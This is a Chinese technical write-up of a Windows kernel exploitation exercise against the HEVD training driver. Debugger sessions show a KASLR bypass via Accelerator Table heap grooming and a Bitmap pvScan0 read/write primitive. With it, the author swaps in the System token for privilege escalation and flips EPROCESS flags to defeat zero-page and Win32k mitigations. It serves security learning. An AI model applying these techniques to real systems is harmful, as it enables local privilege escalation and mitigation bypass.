51CTO首页
AI.x社区
博客
学堂
精品班
直播训练营
企业培训
鸿蒙开发者社区
WOT技术大会
AIGC创新中国行
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术2024年软考PMP项目管理软考资讯
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO题库小程序
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
账号设置 退出

HEVD内核漏洞训练——陪Windows玩儿

作者:k0shl
安全 漏洞
在本文中,我将首先简单介绍一下Bitmap,最新Win10的KASLR机制,对Bitmap造成的影响,以及如何利用Accelerator Table来bypass KASLR。

HEVD内核漏洞训练

前言

前段时间在博客写了一篇关于HEVD内核漏洞利用训练的一篇文章,感觉当时做HEVD收获很大,非常推荐这个训练,这是HackSys Team做的一个Kernel Driver,里面包含了大量的常见漏洞,而且漏洞原理都非常简单,考验的就是各种各样的利用方法,推荐在Win10下尝试,有各种各样经典的利用方法,比如gsharedInfo,GdiSharedHandleTable,NtAllocateVirtualMemory,替换token的shellcode等等。

对这个训练的研究学习会对内核漏洞的原理,利用方式,Windows下很多常见的数据结构有一个初步的了解,从此打开Ring0的大门。

Windows在高版本中采取了越来越多的保护措施来防止漏洞利用,这让攻击变得越来越有意思,很多防护限制让很多漏洞利用变得难上加难,在这篇文章中,我将针对HEVD的一个任意内存读写漏洞,利用Cn33liz的一个Exploit来完成攻击并分析整个过程。

这次攻击有一个主角,那就是Bitmap,本文主要分析在最新Win10版本以及Win8下,Bitmap到底有多强大的威力。

Bitmap

在本文中,我将首先简单介绍一下Bitmap,最新Win10的KASLR机制,对Bitmap造成的影响,以及如何利用Accelerator Table来bypass KASLR。接下来我将和大家分享如何用SetBitmap和GetBitmap来完成攻击,以及攻击的主角,_SURFOBJ中的一个关键结构pvScan0。然后我将和大家分享Win10中的一些疑点,可能是坑,反正至今仍有一些疑惑在里面,接下来,我将结合我的偶像MJ0011在HITCON上一个关于Win8安全特性的演讲,移步Win8,来看看Bitmap的超级杀伤力,以及这些安全特性的防护机制。文末我将把我在Win10和Win8下实验的源码放出来,这个源码中包含对抗Win10和Win8的防护机制的一些过程,是基于Cn33liz大牛的源码改写。文中所有的测试都是基于我改写的源码完成的,相应的注释都在源码中,改动源码仓促也不够漂亮,望大家海涵。因为多次重新调试,地址有变化,可以结合文字一起研究学习。

关于这个漏洞成因,我不再进行详细的讲解,HackSys team的Github项目里有详细说明,这个任意写漏洞就是可以向指定地址写进指定值,而没有对写入地址和写入内容的合法性进行检查。测试环境是最新版Win10。

测试环境是最新版Win10

陪Win10玩儿--CreateBitmap和KASLR

我之前的那篇HEVD的分享中,是在Windows7下面完成的,在Win7下面,我们拥有很多自由,可以向很多特殊的位置、结构写入shellcode,并且在内核态完成shellcode的执行。但是在Win10中,增加了茫茫多的限制,很多利用变得很困难,shellcode似乎变得不太可行。

而在FuzzySecurity中也提到了data attack,在众多限制下,Bitmap给我们提供了一个极大的便捷,这种攻击手段威力很强,非常有趣。

在Windows10中,我们需要获取Bitmap的内核地址,然后利用Bitmap这种_SURFOBJ结构的一个特殊成员变量来完成攻击,也就是我们后面要提到的pvScan0。

在之前版本的Win10中,可以通过一个特殊的结构GdiSharedHandleTable来获得Bitmap的内核对象地址。这个GdiSharedHandleTable是PEB结构体中的一个结构。而里面存放的内容是一个GDICELL64结构。关于在老版本Win10中利用GdiSharedHandleTable如何来获得Bitmap并进行攻击我不再详述,在文章末尾,我会给出一篇非常棒的技术文章,里面详述了这种攻击方式。

在新版本Win10中,fix了这种方法,GdiSharedHandleTable获得的地址,不再是一个有效的pkernelAddress,也就是说,即使我们通过这种方式和createbitmap的handle获得了一个地址,然而并不是真正的pkernelAddress,当然我们的主角pvScan0也不正确。

  1. kd> dt @$PEB nt!_PEB GdiSharedHandleTable // 
  2.    +0x0f8 GdiSharedHandleTable : 0x00000000`00e00000 Void 
  3. kd> db 0x00000000`00e00000+0x0b69*0x18 L8 
  4. 00000000`00e111d8  69 0b c2 ff ff ff ff ff                          i....... 
  5. kd> dd ffffffffffc20b69 
  6. ffffffff`ffc20b69  ???????? ???????? ???????? ???????? 
  7. kd> dd ffff9f9683d01000 
  8. ffff9f96`83d01000  270501ac 00000000 00000000 00000000 
  9. ffff9f96`83d01010  00000000 00000000 00000000 00000000 

可以看到,在通过GdiSharedHandleTable获得的Bitmap的内核地址是一个为开辟的内核空间和真正的Bitmap内核地址有所区别。这时候,gSharedInfo出现了,这个gSharedInfo是一个非常经典的结构,在很多kernel exploitation都出现过,它其中包含着内核结构,我们可以通过它获得内核表,然后通过计算偏移得到内核对象地址。

解决这种问题的方法就是用AcceleratorTable加速键表,我之前的内核漏洞调试笔记之二调试的CVE-2015-2546就是用的加速键表,制造一个稳定的内存空洞,连续申请释放内存,直到两次申请释放的AccleratorTable的内核句柄相同,则再申请相同大小的bitmap,这样就能获得GDI对象了,再通过这个对象的phead就是pkernelAddress。

http://p0.qhimg.com/t0134750a777dd1e538.png

如何获得呢?在这个handleentry里有一个aheList,其中包含了一个phead对象,它就是指向pkerneladdress的。来看一下gSharedInfo的地址,这里我也不知道为什么,感觉可能是Win10很多win32k的结构体不透明化了,看不到tagSharedInfo的结构体,感觉像被隐藏了。

  1. kd> ?user32!gsharedinfo  //获得gsharedinfo的地址值 
  2. Evaluate expression: 140725741012608 = 00007ffd`43cdc680 

获得了gSharedInfo的地址之后,我们可以通过Accelerator Table的handle,获取到gSharedInfo结构中的aheList对应的内核句柄值。

  1. kd> dd 7ffd43cdc680  //查看地址值的内容 
  2. 00007ffd`43cdc680  01360700 00000000 011e0000 00000000 
  3. kd> dt win32k!tagSHAREDINFO  //由于调试时tagSHAREDINFO不透明,这里只能                                   
  4. //从网上拷贝一个方便说明 
  5.      +0x000 psi                    :  tagSERVERINFO 
  6. +0x008 aheList                :  _HANDLEENTRY 
  7. kd> dq 7ffd43cdc680+0x8 L1 //+0x8位置的HANDLEENTRY就是我们要的表 
  8. 00007ffd`43cdc688  00000000`011e0000 

这样就能得到句柄实际内核地址的表了,也就是指向GDI对象的表,这里就要计算对应的偏移了,计算方法其实和之前GdiSharedHandleTable很像,那个算对应GDICELL64地址的计算方法是:

GdiSharedHandleTable+(handle & 0xffff)*sizeof(GDICELL64)

这里就用_HANDLETABLE_ENTRY + (Accel & 0xffff)*sizeof(Accel)算出地址,这里Accel的值是:

  1. kd> r eax 
  2. eax=1700b9 
  3. kd> p 
  4. 0033:00007ff6`956112d1 488d1449   lea     rdx,[rcx+rcx*2]//计算handle的值 
  5. kd> p 
  6. 0033:00007ff6`956112d5 488bc8          mov     rcx,rax 
  7. kd> r rdx 
  8. rdx=000000000000022b// handle的值为22b 
  9. kd> dd 11e0000+22b*8 L1 // 11e0000是刚才获得的HANDLENTRY,计算出偏移 
  10.  // 指向的就是GDI对象 
  11. 00000000`011e1158  81be7000 ffffbad3 

紧接着调用DestroyAcceleratorTable释放这个加速键表,可以看到对应句柄内核指针的值也被释放了。注意这里申请的Accelerator Table的大小是700,同样如果制造出一个稳定的hole之后,申请bitmap的大小也是700。

  1. kd> p 
  2. 0033:00007ff6`956112d8 488b5cd500      mov     rbx,qword ptr [rbp+rdx*8] 
  3. kd> p 
  4. 0033:00007ff6`956112dd ff15451f0000    call    qword ptr [00007ff6`95613228] 
  5. kd> p 
  6. 0033:00007ff6`956112e3 babc020000      mov     edx,2BCh 
  7. kd> dd 11e0000+22b*8// 对应索引的位置GDI对象被释放 
  8. 00000000`011e1158  0000042f 00000000 

可以看到,对应位置存放的GDI对象也释放掉了,再次通过Create申请Accelerator Table。

  1. 0033:00007ff6`956112eb ff152f1f0000    call    qword ptr [00007ff6`95613220] 
  2. kd> p//返回值eax 
  3. 0033:00007ff6`956112f1 0fb7c8          movzx   ecx,ax 
  4. kd> r rax 
  5. rax=00000000001800b9 
  6. kd> p 
  7. 0033:00007ff6`956112f4 488d1449        lea     rdx,[rcx+rcx*2] 
  8. kd> p 
  9. 0033:00007ff6`956112f8 488bc8          mov     rcx,rax 
  10. kd> r rdx//计算获得handle,和上一次申请的handle值一样 
  11. rdx=000000000000022b 
  12. kd> dd 11e0000+22b*8//查看pkernelAddress 
  13. 00000000`011e1158  81be7000 ffffbad3 
  14. kd> dd ffffbad381be7000 l90//对应位置存放的值,+0x0位置就是phead 
  15.                             //GdiSharedHandleTable被fix,可以用这个方法 
  16. ffffbad3`81be7000  001800b9 00000000 00000000 00000000 
  17. ffffbad3`81be7010  00000000 00000000 000002bc 00000000 

句柄虽然改变但是对应索引位置在shared info handle entry的值仍然是相同的,这样,再次在相同位置申请bitmap,首先释放,来看下pkernelAddress的值:

  1. kd> p 
  2. 0033:00007ff6`95611311 ff15111f0000    call    qword ptr [00007ff6`95613228] 
  3. kd> p 
  4. 0033:00007ff6`95611317 33c9            xor     ecx,ecx 
  5. kd> dd ffffbad381be7000//查看GDI对象的内容也被释放 
  6. ffffbad3`81be7000  ???????? ???????? ???????? ???????? 
  7. ffffbad3`81be7010  ???????? ???????? ???????? ???????? 
  8. ffffbad3`81be7020  ???????? ???????? ???????? ???????? 

指向的空间也被释放了,随后通过CreateBitmap申请bitmap,大小同样是700,来占用Accelerator制造的稳定内存空洞。调用CreateBitmap之后占用了内存空洞。这样,我们直接找到ffffbad381be7000这个GDI对象。

  1. kd> p//调用CreateBitmap创建Bitmap 
  2. 0033:00007ff6`95611345 ff15dd1c0000    call    qword ptr [00007ff6`95613028] 
  3. kd> p//创建成功返回 
  4. 0033:00007ff6`9561134b 488906          mov     qword ptr [rsi],rax 
  5. kd> dd ffffbad381be7000//查看原来Accelerator Table的内核地址位置的值 
  6. ffffbad3`81be7000  96050bd0 ffffffff 00000000 00000000 

可以看到,我们成功获得了Bitmap的pkernelAddress,就是0xffffffff96050bd0,这样,我们就成功在KASLR和fix GdiSharedHandleTable下,完成了bitmap pkernelAddress的获取。

SetBitmap/GetBtimap和pvScan0

利用gSharedInfo获取aheList,从而得到Accelerator Table在gshareInfo中的GDI对象从而获得内核地址,利用Accelerator Table制造稳定的内存空洞,最后绕过KASLR和获取Bitmap的pkernelAddress的目的就是获得pvScan0这个结构,这个是Bitmap之所以成为data attack的核心。

这里我要提一下,在调试过程中,我们需要用__asm int 3来下断点,但是在64位下VS不支持内联汇编,因此我们在项目中创建一个.asm文件,实现int 3功能,再将其编译,在项目主文件中用Int_3()来下软中断(详见我的源码),这样我们在SetBitmap下断点,首先命中GDI32!SetBitmapBitsStub:

  1. kd> p 
  2. GDI32!SetBitmapBitsStub+0x1c: 
  3. 0033:00007fff`bd5b44ac 488bd9          mov     rbx,rcx 
  4. kd> p//调用GDI32的IsTextOutAPresent -> IsSetWorldTransformImplPresent函数 
  5. GDI32!SetBitmapBitsStub+0x1f: 
  6. 0033:00007fff`bd5b44af e878b50000      call    GDI32!IsTextOutAPresent (00007fff`bd5bfa2c) 

随后会到达call IsTextOutAPresent函数调用,这个函数在GDI32的实现是IsSetWorldTransformmImplPresent。

  1. char IsSetWorldTransformImplPresent() 
  3.   char result; // al@2 
  4.   char v1; // [sp+30h] [bp+8h]@5 
  5.    
  6.   if ( dword_18002E670 == 1 )//dword_18002E670检查是否为1 
  7.   { 
  8.     result = dword_18002E670
  9.   } 
  10.   else if ( dword_18002E670 == 2 || (v1 = 0, ApiSetQueryApiSetPresence((__int64)L"LN", (__int64)&v1) < 0) ) 
  11.   { 
  12.     result = 0
  13.   } 
  14.   else 
  15.   { 
  16.     result = v1
  17.     dword_18002E670 = 2 - (v1 != 0); 
  18.   } 
  19.   return result; 

这个函数主要是对dword_18002E670这个值进行判断,这个值是hmod ext ms win gdi internal desktop l1.1.0.dll+0x8位置的一个结构体变量,若为1则直接返回。

  1. kd> p 
  2. GDI32!IsUpdateColorsPresent+0x4://获取dll+0x8位置的值 
  3. 0033:00007fff`bd5bfa30 8b0d3aec0100    mov     ecx,dword ptr [GDI32!_hmod__ext_ms_win_gdi_internal_desktop_l1_1_0_dll+0x8 (00007fff`bd5de670)] 
  4. kd> dd 00007fff`bd5de670//这个位置的值为1,后面是dll函数偏移 
  5. 00007fff`bd5de670  00000001 00000000 00000000 00000000 
  6. 00007fff`bd5de680  ba17ba20 00007fff ba174230 00007fff 
  7. 00007fff`bd5de690  ba1765d0 00007fff ba1eafa0 00007fff 
  8. kd> p 
  9. GDI32!IsUpdateColorsPresent+0xa://将这个值和1作比较 
  10. 0033:00007fff`bd5bfa36 83f901          cmp     ecx,1 
  11. kd> r ecx 
  12. ecx=1 

这个可能是判断ext_ms_win_gdi_internal_desktop_l1.1.0.dll的加载情况,_imp_SetBitMapBits就链在这个dll中,随后会跳转。到zwGdiSetBitmapBits中。

  1. kd> p //调用_imp_SetBitmapBits函数 
  2. GDI32!SetBitmapBitsStub+0x30: 
  3. 0033:00007fff`bd5b44c0 ff15c2be0200    call    qword ptr [GDI32!_imp_SetBitmapBits (00007fff`bd5e0388)] 
  4. kd> t//跳转到NtGdiSetBitmapBits 
  5. gdi32full!SetBitmapBits: 
  6. 0033:00007fff`ba17bcf0 48ff2509290900  jmp     qword ptr [gdi32full!_imp_NtGdiSetBitmapBits (00007fff`ba20e600)] 
  7. kd> p 
  8. win32u!ZwGdiSetBitmapBits: 
  9. 0033:00007fff`ba2d26f0 4c8bd1          mov     r10,rcx 
  10. //随后会进入ZwGdiSetBitmap 
  11. .text:0000000180003330                 public ZwGdiSetBitmapDimension 
  12. .text:0000000180003330 ZwGdiSetBitmapDimension proc near       ; DATA XREF: .rdata:000000018000A544_x0019_o 
  13. .text:0000000180003330                                         ; .rdata:off_18000C608_x0019_o ... 
  14. .text:0000000180003330                 mov     r10, rcx 
  15. .text:0000000180003333                 mov     eax, 1118h 
  16. .text:0000000180003338                 test    byte ptr ds:7FFE0308h, 1 
  17. .text:0000000180003340                 jnz     short loc_180003345 
  18. .text:0000000180003342                 syscall 
  19. .text:0000000180003344                 retn 

syscall是AMD CPU下的sysenter,以此进入内核层,由于64位下没有nt!KiFastCallEntry,而改用的是nt!KiSystemCall64,在64位系统下启用了四个新的MSR寄存器,有不同的作用,其中MSR_LSTAR保存的是rip的相关信息,可以通过rdmsr c0000082的方法查看到syscall跳转地址。这个地址正是nt!KiSystemCall64的入口地址。

  1. kd> rdmsr c0000082 
  2. msr[c0000082] = fffff801`7cb740c0 
  3. nt!KiSystemCall64: 
  4. 0033:fffff801`7cb740c0 0f01f8          swapgs 
  5. 0033:fffff801`7cb740c3 654889242510000000 mov   qword ptr gs:[10h],rsp 

到此,我们进入SetBitmap的内核态,之所以pvScan0这么重要,是因为SetBitmap会对pvScan0指向的内容写数据,GetBitmap会获取pvScan0指向的内容。这样,我们可以设置一个Manager Bitmap(以下称为M)和一个Work Bitmap(以下称为W),将M的pvScan0修改成W的pvScan0地址,这样每次就能用在M上调用SetBitmap将W的pvScan0内容修改成我们想要读或者写的地址,再调用Get/Set Bitmap来向指定地址读取/写入数据了。这么说有点乱,来看一下整个过程。

通过AcceleratorTable制造内存空洞占位获取Bitmap的pkernelAddress之后,可以获取到pvscan0的值,其中M存放W的pvscan0所存放的地址,而W的pvscan0用于最后写入相关的内容,这样我们调用setbitmapbits函数的时候,会将M的pvscan0里存放地址指向的值修改为要写入的地址。

  1. kd> dq ffffbad383ae9050 L1 // M的pvScan0,现在指向W,这样每次修改,相当                                //于修改W的pvScan0 
  2. ffffbad3`83ac8050  ffffbad3`83aeb050 
  3. kd> dq ffffbad383aeb050 L1//W的pvScan0,所在地址值就是M的pvScan0值 
  4. ffffbad3`83ac8050  ffffe28d`12762af0//要修改的就是这个值,向这个值的内容 
  5. //读取/写入数据 

这里就会将ffffbad383aeb050中的值改写,因此在这里下内存写入断点。

  1. kd> ba w1 ffffbad383aeb050//向W的pvScan0下内存写入断点 
  2. kd> p 
  3. Breakpoint 0 hit 
  4. win32kfull!memmove+0x1cf://中断在win32kfull!memmove函数中 
  5. ffffbab6`0b940f0f 75ef            jne     win32kfull!memmove+0x1c0 (ffffbab6`0b940f00) 
  6. kd> bl 
  7.  0 e ffffbad383aeb050 w 1 0001 (0001) 
  8. kd> kb 
  9. RetAddr:ArgstoChild  : Call Site 
  10. ffffbab6`0b88405c : 00000000`00fff8a0 00000000`00000000 00000000`00000a9a ffffbab6`0bbbf1da : win32kfull!memmove+0x1cc 
  11. ffffbab6`0b883e1a : ffffbad3`83ae9000 00000000`00000000 ffffffff`00000008 fffff801`00000704 : win32kfull!bDoGetSetBitmapBits+0x168 
  12. 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : win32kfull!GreSetBitmapBits+0x17a 
  13. kd> dq ffffbad383adc050 L1 //这里会写入新的pvScan0,这个值是当前进程的                                       //token地址 
  14. ffffbad3`83aeb050  ffffe28d`12762b58 
  15. kd> !process 0 0 //查看当前进程 
  16. PROCESS ffffe28d12762800 
  17.     SessionId: 1  Cid: 10cc    Peb: 011cb000  ParentCid: 1124 
  18.     DirBase: 48d5b000  ObjectTable: ffffa709d16d1640  HandleCount: <Data Not Accessible> 
  19. Image: Stop_by_win10.exe 
  20. kd> dt nt!_EPROCESS Token ffffe28d12762800 
  21.    +0x358 Token : _EX_FAST_REF 
  22. kd> dq ffffe28d12762800+358 L1//看看token值,就是pvScan0的值 
  23. ffffe28d`12762b58  ffffa709`d1903996 

在Win10中,绝大多数的win32k.sys实现都在win32full里完成,这里利用M的pvScan0完成了对W的pvScan0值的修改,使之指向了当前进程的Token,接下来只需要调用GetBitmap/SetBitmap通过W的pvScan0,就可以完成对Token的读取和修改,从而完成提权。

  1. kd> !process 0 4 //获取System _EPROCESS结构 
  2. **** NT ACTIVE PROCESS DUMP **** 
  3. PROCESS ffffe28d0f662040 
  4.     SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000 
  5.     DirBase: 001aa000  ObjectTable: ffffa709c88032c0  HandleCount: <Data Not Accessible> 
  6.     Image: System 
  7. kd> dq ffffe28d0f662040+358 L1 //得到System  Token值 
  8. ffffe28d`0f662398  ffffa709`c88158ad 
  9. kd> p//调用setBitmap将这个值写入当前进程的地址 
  10. 0033:00007ff7`9dd2217f 488bce          mov     rcx,rsi 
  11. kd> g 
  12. Break instruction exception - code 80000003 (first chance) 
  13. 0033:00007ff7`9dd222b0 cc              int     3 
  14. kd> !process //当前进程的_EPROCESS 
  15. PROCESS ffffe28d12cb2080 
  16.     SessionId: 1  Cid: 0b48    Peb: 0117d000  ParentCid: 1124 
  17.     DirBase: 320b6000  ObjectTable: ffffa709d5f84500  HandleCount: <Data Not Accessible> 
  18.     Image: Stop_by_win10.exe 
  19. kd> dq ffffe28d12cb2080+358 L1 //利用SetBitmap替换后,当前进程Token变成了                          //System Token,提权完成 
  20. ffffe28d`12cb23d8  ffffa709`c88158ad 

http://p3.qhimg.com/t0144791914c38b1dc5.png

我和大家分享了pvScan0在Bitmap这种data attack中的核心地位,Bitmap的pkernelAddress的获取方法和如何通过pvScan0完成攻击,接下来,我将结合偶像MJ0011的PPT,来讲一下Win10的一些坑,以及回归Win8下来看一下MJ0011的PPT中介绍的一些防护机制,和Bitmap的威力。

被Win10吊打的日子

在MJ0011的PPT中介绍了几种防护机制,比如禁零页,禁Win32k调用,SMEP,ExPoolWithTagNX等等。本来刚开始想在Win10下进行实验,但是发现Win10下有很多奇怪的坑。这里简单提一下几种防护机制:

1、禁零页,NtAllocateVirtualMmemory是现在常用的内核漏洞利用手法,Win8 _EPROCESS增加了一比特的Flags.VdmAllowed,当为0时禁用,当为1时可用。

2、禁Win32k,Win32k存在很多漏洞,比如UAF,我在前面两个经典内核漏洞调试的分享中都是Win32k出的问题,这里通过_EPROCESS结构增加一比特的Flags2.DisallowWin32kSystemCalls禁用调用。

3、SMEP,在内核漏洞利用中,通常是利用内核态的一些失误执行用户态申请的空间存放的shellcode,这里直接通过SMEP禁止在内核态执行用户态空间的代码。这里,我将以禁Win32k调用和禁零页来做实验,利用的就是Bitmap来修改这两个比特的值,看看能不能绕过禁用机制,首先来看一下当前进程,以及对应的两个值。

  1. kd> !process 
  2. PROCESS ffffe28d12cb2080 
  3.     SessionId: 1  Cid: 0b48    Peb: 0117d000  ParentCid: 1124 
  4.     DirBase: 320b6000  ObjectTable: ffffa709d5f84500  HandleCount: <Data Not Accessible> 
  5.     Image: Stop_by_win10.exe 
  6. kd> dt nt!_EPROCESS VdmAllowed ffffe28d12cb2080 
  7.    +0x304 VdmAllowed : 0y0//标志位为0,禁用零页 
  8. kd> dt nt!_EPROCESS DisallowWin32kSystemCalls ffffe28d12cb2080 
  9.    +0x300 DisallowWin32kSystemCalls : 0y0//标志位为1,默认不禁用Win32k 
  10. kd> dd ffffe28d12cb2080+300 L4 //查看一下Flags2和Flags的值 
  11. ffffe28d`12cb2380  0000d000 144d0c01 a1beb1e1 01d288e0 

可以看到,在当前进程Win32k API是不禁用的,也就是说,我们仍然可以直接调用Win32k的API,而NtAllocateVirtualMemory则处于禁用状态。对于Flags来说是0000d0000,Flags2来说是144d0c01,这样把它们转换成二进制,把对应比特位置换为1(这个内容可以在我的源码中看到),然后赋值给各自的Flags。

  1. kd> r r13//获取两个Flags值,并且修改比特位之后的值 
  2. r13=a1beb1e1164d0c00 
  3. kd> r r14 
  4. r14=144d0c018000d000 
  5. kd> g//命中软中断 
  6. Break instruction exception - code 80000003 (first chance) 
  7. 0033:00007ff7`9dd222b0 cc              int     3 
  8. kd> g 
  9. Break instruction exception - code 80000003 (first chance) 
  10. 0033:00007ff7`9dd222b0 cc              int     3 
  11. kd> dd ffffe28d12cb2080+300 L4//修改后,通过SetBitmap写入偏移 
  12. ffffe28d`12cb2380  8000d000 164d0c01 a1beb1e1 01d288e0 

这里我采用了Win7零页分配的方法,handle选择0xffffffffffffffff,但是发现在Win10中,会调用ObpReferenceObjectByHandleWithTag函数Check handle,如果不是一个有效的handle,则直接返回,NTSTATUS直接报错。

  1. kd> p 
  2. nt!MiAllocateVirtualMemory+0x7b8: 
  3. fffff801`7cee27c8 498bca          mov     rcx,r10 
  4. kd> p //ObpReferenceObjectByHandleWithTag check handle 
  5. nt!MiAllocateVirtualMemory+0x7bb: 
  6. fffff801`7cee27cb e8a0070100      call    nt!ObpReferenceObjectByHandleWithTag (fffff801`7cef2f70) 
  7. kd> p 
  8. nt!MiAllocateVirtualMemory+0x7c0: 
  9. fffff801`7cee27d0 89442464        mov     dword ptr [rsp+64h],eax 
  10. kd> r eax//没有这个handle则返回NTSTATUS 
  11. eax=c0000008 
  12. // ObpReferenceObjectByHandleWithTag 检查逻辑 
  13.   if ( (BugCheckParameter1 & 0x80000000) != 0i64 ) 
  14.   { 
  15.     if ( BugCheckParameter1 == -1i64 )//如果handle值为0xfff....ff 
  16.     { 
  17.       if ( v9 != PsProcessType && v9 ) 
  18.       { 
  19.         LODWORD(v12) = -1073741788; 
  20.       } 
  21.       else 
  22.       { 
  23.         v37 = *(_QWORD *)(v8 + 184); 
  24.         if ( v11 & 0xFFE00000 && a4 ) 
  25.         { 
  26.           LODWORD(v12) = -1073741790; 
  27.         } 
  28.         …… 
  29.       } 
  30.       return (unsigned int)v12;                 // C0000008 
  31.     } 
  32.     if ( BugCheckParameter1 == -2i64 ) 
  33.     { 
  34.     } 
  35.   } 

这样,我们就只能修改代码通过OpenProcess获得当前进程handle,并且将VdmAllowed置1,但是发现即使NTSTATUS返回0,也就是STATUS_SUCCESS,内存状态可写,只需要memset初始化内存即可。

  1. kd> !process 
  2. PROCESS ffffe28d12fb0080 
  3.     SessionId: 1  Cid: 10b0    Peb: 00ddb000  ParentCid: 1124 
  4.     DirBase: 51685000  ObjectTable: ffffa709d9138200  HandleCount: <Data Not Accessible> 
  5.     Image: Stop_by_win10.exe 
  6. kd> dt nt!_EPROCESS VdmAllowed ffffe28d12fb0080 //当前VdmAllowed为1 
  7.    +0x304 VdmAllowed : 0y1 
  8. kd> p 
  9. 0033:00007ff7`16e7204c ff55a0          call    qword ptr [rbp-60h] 
  10. kd> p 
  11. 0033:00007ff7`16e7204f 0f28b424e0040000 movaps  xmm6,xmmword ptr [rsp+4E0h] 
  12. kd> p 
  13. 0033:00007ff7`16e72057 85c0            test    eax,eax 
  14. kd> r eax//NTSTATUS返回0,也就是STATUS_SUCCESS 
  15. eax=0 
  16. kd> dd 4600000000//等待初始化的内存 
  17. 00000046`00000000  ???????? ???????? ???????? ???????? 
  18. 00000046`00000010  ???????? ???????? ???????? ???????? 

同样,我们修改Win32k为1,这样就禁用了win32k调用,可以发现,在禁用后,会阻止win32k的调用,从而无法初始化cmd。关于win32k调用的逻辑后面会讲到。

http://p7.qhimg.com/t01ced5dfa6174aad9b.png

回归Win8看防护之NtAllocateVirtualMemory

接下来我们回到Win8 x86,来看一下NtAllocateVirtualMemory的防护到底是怎样的。这里请使用文末我修改后的适用于win8 x86的代码。首先是禁用零页申请内存。我们首先在禁用零页时调试,首先进入内核态,从ntdll进入nt。

  1. kd> p 
  2. 001b:77d4f04d e803000000    call    77d4f055//调用NtAllocateVirtualMemory 
  3. kd> t 
  4. 001b:77d4f055 8bd4            mov     edx,esp 
  5. 001b:77d4f055 8bd4            mov     edx,esp 
  6. 001b:77d4f057 0f34            sysenter//x86下用sysenter进入内核态 
  7. 001b:77d4f059 c3              ret 

在nt!NtAllocateVirtualMemory下断点跟踪,在入口处会先将Handle、BaseAddress等内容传入寄存器(用于各种检查,比如对Handle检查合法性,在之前已经提过),接下来会通过fs:[0x124]获取到_KTHRAD结构

  1. kd> p 
  2. nt!NtAllocateVirtualMemory+0x34://获取KTHREAD结构 
  3. 81a891a2 648b3d24010000  mov     edi,dword ptr fs:[124h] 
  4. kd> p 
  5. nt!NtAllocateVirtualMemory+0x3b: 
  6. 81a891a9 897da8          mov     dword ptr [ebp-58h],edi 
  7. kd> r edi 
  8. edi=86599bc0 
  9. kd> dt nt!_KTHREAD 86599bc0 
  10.    +0x000 Header           : _DISPATCHER_HEADER 
  11.    +0x010 SListFaultAddress : (null) 

之后会将_KTHREAD+0x80偏移的值交给eax寄存器,偏移加0x80实际上就是EPROCESS结构,这个位置属于APC域,这个位置在KTHREAD+0x70的位置,而EPROCESS又保存在KAPC_STATE+0x10的位置

  1. kd> p//edi是KTHREAD,eax的值是EPROCESS 
  2. nt!NtAllocateVirtualMemory+0x3e: 
  3. 81a891ac 8b8780000000    mov     eax,dword ptr [edi+80h] 
  4. kd> p 
  5. nt!NtAllocateVirtualMemory+0x44: 
  6. 81a891b2 8945b0          mov     dword ptr [ebp-50h],eax 
  7. kd> r eax 
  8. eax=85a44040 
  9. kd> !process 
  10. PROCESS 85a44040  SessionId: 1  Cid: 0860    Peb: 7f74d000  ParentCid: 0f08 
  11.     DirBase: 3df14300  ObjectTable: 8c173740  HandleCount: <Data Not Accessible> 
  12.     Image: Stop_by_win10.exe 
  13. kd> dt nt!_KTHREAD ApcState//偏移加0x70 
  14.    +0x070 ApcState : _KAPC_STATE 
  15. kd> dt nt!_KAPC_STATE//偏移加0x10,一共是0x80,对应的位置是EPROCESS 
  16.    +0x000 ApcListHead      : [2] _LIST_ENTRY 
  17.    +0x010 Process          : Ptr32 _KPROCESS 

接下来我们单步跟踪,到达一处判断,这里会将BaseAddress和0x10000作比较,小于则跳转到另一处判断

  1. kd> p 
  2. nt!NtAllocateVirtualMemory+0x9b7: 
  3. 81a89b25 3bd0            cmp     edx,eax 
  4. kd> r edx 
  5. edx=00000060 
  6. kd> r eax 
  7. eax=00010000 
  8. kd> p 
  9. nt!NtAllocateVirtualMemory+0x9b9://如果申请地址值小于0x1000,则跳转 
  10. 81a89b27 0f8257781200    jb      nt! ?? ::NNGAKEGL::`string'+0x19d1a (81bb1384) 
  11. kd> p 
  12. nt! ?? ::NNGAKEGL::`string'+0x19d1a: 
  13. 81bb1384 f787c400000000000001 test dword ptr [edi+0C4h],1000000h 
  14. kd> dd edi+c4 L1//edi+0C4就是Flags 
  15. 85a44104  144d0c01 
  16. kd> p 
  17. nt! ?? ::NNGAKEGL::`string'+0x19d24://这里会将VdmAllowed值作比较判断 
  18. 81bb138e 0f859987edff    jne     nt!NtAllocateVirtualMemory+0x9bf (81a89b2d) 

这个值很有意思,就是_EPROCESS.Flags2的值,来看一下,而这里判断的就是Flags2中的一个比特位VdmAllowed

  1. kd> dt nt!_EPROCESS Flags 85a44040 
  2.    +0x0c4 Flags : 0x144d0c01 
  3. kd> dt nt!_EPROCESS VdmAllowed 85a44040 
  4.    +0x0c4 VdmAllowed : 0y0 

这里值为0,也就是禁用零页分配,因此这里分配不成功将会进入处理,返回C00000F0

  1. kd> p 
  2. nt! ?? ::NNGAKEGL::`string'+0x19d2a: 
  3. 81bb1394 bef00000c0      mov     esi,0C00000F0h 
  4. kd> p 
  5. nt! ?? ::NNGAKEGL::`string'+0x19d2f: 
  6. 81bb1399 e94c87edff      jmp     nt!NtAllocateVirtualMemory+0x97c (81a89aea) 

我们来看一下NtAllocateVirtualMemory相关逻辑的伪代码。

  1. NTSTATUS __stdcall NtAllocateVirtualMemory(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG ZeroBits, PULONG AllocationSize, ULONG AllocationType, ULONG Protect) 
  3.       v65 = ProcessHandle
  4.     v68 = BaseAddress
  5.       v67 = AllocationSize
  6.     v7 = __readfsdword(292);//获取_KTHREAD结构 
  7.     v7v76 = v7; 
  8.     v78 = *(PVOID *)(v7 + 128); //获取+0x80 EPROCESS结构 
  9.     …… 
  10.     PreviousMode[0] = *(_BYTE *)(v7 + 346); 
  11.     ms_exc.registration.TryLevel = 0
  12.     v9 = v68;//传递地址值 
  13.     …… 
